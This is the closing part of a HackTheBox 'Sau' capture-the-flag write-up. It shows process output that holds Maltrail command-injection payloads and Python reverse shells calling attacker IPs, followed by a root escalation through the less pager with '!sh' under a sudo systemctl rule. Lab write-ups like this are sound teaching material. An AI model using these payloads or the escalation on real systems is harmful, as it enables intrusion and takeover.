<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>puma@sau:/opt/maltrail<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>puma on sau:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User puma may run the following commands on sau:
    <span class="o">(</span>ALL : ALL<span class="o">)</span> NOPASSWD: /usr/bin/systemctl status trail.service
</code></pre></div></div>

<p>The user <code class="language-plaintext highlighter-rouge">puma</code> can run <code class="language-plaintext highlighter-rouge">/usr/bin/systemctl status trail.service</code> using sudo as <code class="language-plaintext highlighter-rouge">root</code> without any password.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded <span class="o">(</span>/etc/systemd/system/trail.service<span class="p">;</span> enabled<span class="p">;</span> vendor preset: enabled<span class="o">)</span>
     Active: active <span class="o">(</span>running<span class="o">)</span> since Tue 2023-08-01 13:04:03 UTC<span class="p">;</span> 5h 37min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 893 <span class="o">(</span>python3<span class="o">)</span>
      Tasks: 159 <span class="o">(</span>limit: 4662<span class="o">)</span>
     Memory: 484.3M
     CGroup: /system.slice/trail.service
             ├─  893 /usr/bin/python3 server.py
             ├─ 1146 /bin/sh <span class="nt">-c</span> logger <span class="nt">-p</span> auth.info <span class="nt">-t</span> <span class="s2">"maltrail[893]"</span> <span class="s2">"Failed password for ;</span><span class="sb">`</span><span class="nb">echo</span> <span class="s2">"cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNv&gt;
             ├─ 1147 /bin/sh -c logger -p auth.info -t "</span>maltrail[893]<span class="s2">" "</span>Failed password <span class="k">for</span> <span class="p">;</span><span class="sb">`</span><span class="s2">echo "</span>cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNv&gt;
             ├─ 1150 sh
             ├─ 1151 python3 <span class="nt">-c</span> import socket,os,pty<span class="p">;</span><span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span><span class="p">;</span>s.connect<span class="o">((</span><span class="s2">"10.10.14.210"</span>,3333<span class="o">))</span><span class="p">;</span>os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,0<span class="o">)</span><span class="p">;</span>os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,1<span class="o">)</span><span class="p">;</span>os.dup2&gt;
             ├─ 1152 /bin/sh
             ├─ 7521 gpg-agent <span class="nt">--homedir</span> /home/puma/.gnupg <span class="nt">--use-standard-socket</span> <span class="nt">--daemon</span>
             ├─15101 <span class="nb">sudo</span> /usr/bin/systemctl status trail.service
             ├─15102 /usr/bin/systemctl status trail.service
             ├─15103 pager
             ├─15145 /bin/sh <span class="nt">-c</span> logger <span class="nt">-p</span> auth.info <span class="nt">-t</span> <span class="s2">"maltrail[893]"</span> <span class="s2">"Failed password for ;</span><span class="sb">`</span><span class="nb">echo </span>cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfS&gt;
             ├─15146 /bin/sh <span class="nt">-c</span> logger <span class="nt">-p</span> auth.info <span class="nt">-t</span> <span class="s2">"maltrail[893]"</span> <span class="s2">"Failed password for ;</span><span class="sb">`</span><span class="nb">echo </span>cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfS&gt;
             ├─15149 bash
             ├─15150 python3 <span class="nt">-c</span> import socket,subprocess,os<span class="p">;</span><span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span><span class="p">;</span>s.connect<span class="o">((</span><span class="s2">"10.10.14.125"</span>,1234<span class="o">))</span><span class="p">;</span>os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,0<span class="o">)</span><span class="p">;</span> os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,1<span class="o">)&gt;</span>
             ├─15151 bash
             ├─15172 /bin/sh <span class="nt">-c</span> logger <span class="nt">-p</span> auth.info <span class="nt">-t</span> <span class="s2">"maltrail[893]"</span> <span class="s2">"Failed password for ;</span><span class="sb">`</span><span class="nb">echo </span>cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfS&gt;
             ├─15173 /bin/sh <span class="nt">-c</span> logger <span class="nt">-p</span> auth.info <span class="nt">-t</span> <span class="s2">"maltrail[893]"</span> <span class="s2">"Failed password for ;</span><span class="sb">`</span><span class="nb">echo </span>cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfS&gt;
             ├─15176 bash
             ├─15177 python3 <span class="nt">-c</span> import socket,subprocess,os<span class="p">;</span><span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span><span class="p">;</span>s.connect<span class="o">((</span><span class="s2">"10.10.14.125"</span>,1234<span class="o">))</span><span class="p">;</span>os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,0<span class="o">)</span><span class="p">;</span> os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,1<span class="o">)&gt;</span>
             ├─15178 bash
             ├─15189 <span class="nb">sudo </span>systemctl
             ├─15191 /bin/sh <span class="nt">-c</span> logger <span class="nt">-p</span> auth.info <span class="nt">-t</span> <span class="s2">"maltrail[893]"</span> <span class="s2">"Failed password for ;</span><span class="sb">`</span><span class="nb">echo </span>cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfS&gt;
             ├─15192 /bin/sh <span class="nt">-c</span> logger <span class="nt">-p</span> auth.info <span class="nt">-t</span> <span class="s2">"maltrail[893]"</span> <span class="s2">"Failed password for ;</span><span class="sb">`</span><span class="nb">echo </span>cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfS&gt;
             ├─15195 bash
             ├─15196 python3 <span class="nt">-c</span> import socket,subprocess,os<span class="p">;</span><span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span><span class="p">;</span>s.connect<span class="o">((</span><span class="s2">"10.10.14.125"</span>,1234<span class="o">))</span><span class="p">;</span>os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,0<span class="o">)</span><span class="p">;</span> os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,1<span class="o">)&gt;</span>
             ├─15197 bash
             ├─15232 script
             ├─15233 bash <span class="nt">-i</span>
             ├─15249 <span class="nb">sudo</span> /usr/bin/systemctl status trail.service
             ├─15250 /usr/bin/systemctl status trail.service
             ├─15251 pager
             ├─15252 sh <span class="nt">-c</span> /bin/bash <span class="nt">-c</span> sh
lines 1-41
</code></pre></div></div>

<p>When we run the command, a default pager is opened, which is likely to be <code class="language-plaintext highlighter-rouge">less</code>. In that case, we can type <code class="language-plaintext highlighter-rouge">!sh</code> to get root shell, since the <code class="language-plaintext highlighter-rouge">systemctl</code> process is running as <code class="language-plaintext highlighter-rouge">root</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">.</span>
<span class="nb">.</span>
SNIP
<span class="nb">.</span>
<span class="nb">.</span>
             ├─15233 bash <span class="nt">-i</span>
             ├─15249 <span class="nb">sudo</span> /usr/bin/systemctl status trail.service
             ├─15250 /usr/bin/systemctl status trail.service
             ├─15251 pager
             ├─15252 sh <span class="nt">-c</span> /bin/bash <span class="nt">-c</span> sh
<span class="o">!</span>sh
<span class="c"># </span>
<span class="c"># bash</span>
root@sau:/opt/maltrail# <span class="nb">id</span><span class="p">;</span> <span class="nb">whoami
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
root
root@sau:/opt/maltrail# 
root@sau:/opt/maltrail# 
root@sau:/opt/maltrail# <span class="nb">hostname
</span>sau
root@sau:/opt/maltrail# 
root@sau:/opt/maltrail# 
</code></pre></div></div>

<p>That worked! And we got <code class="language-plaintext highlighter-rouge">root</code> shell.</p>

<h1 id="conclusion">CONCLUSION</h1>

<p>In this writeup, we explored the <strong>Sau</strong> machine on <strong>HackTheBox</strong>. We identified an open port <code class="language-plaintext highlighter-rouge">55555</code> running a web application called <code class="language-plaintext highlighter-rouge">request-baskets</code>. Through this application, we found a <strong>Server Side Request Forgery (SSRF)</strong> vulnerability (<code class="language-plaintext highlighter-rouge">CVE-2023-27163</code>) that allowed us to access internal services running on the host.</p>

<p>We discovered that the internal service was an application called <code class="language-plaintext highlighter-rouge">Maltrail</code> version <code class="language-plaintext highlighter-rouge">0.53</code>, which had an <strong>unauthenticated blind OS command injection</strong> vulnerability. We exploited this weakness to execute arbitrary OS-level commands and gain initial access as the user <code class="language-plaintext highlighter-rouge">puma</code>.</p>

<p>With <code class="language-plaintext highlighter-rouge">puma</code> privileges, we found that the user could run <code class="language-plaintext highlighter-rouge">/usr/bin/systemctl status trail.service</code> with <code class="language-plaintext highlighter-rouge">sudo</code> privileges without a password. Taking advantage of this, we used the <code class="language-plaintext highlighter-rouge">less</code> pager to escalate privileges to <code class="language-plaintext highlighter-rouge">root</code> by executing the <code class="language-plaintext highlighter-rouge">!sh</code> command.</p>

<p>That’s all in this writeup.</p>

<p>Thanks for reading. Hope you liked it.</p>




  <small>tags: <em>CVE-2023-27163</em> - <em>blind OS command injection</em> - <em>exploiting sudo rights</em></small>


      </section>
    </div>
  </body>
</html>
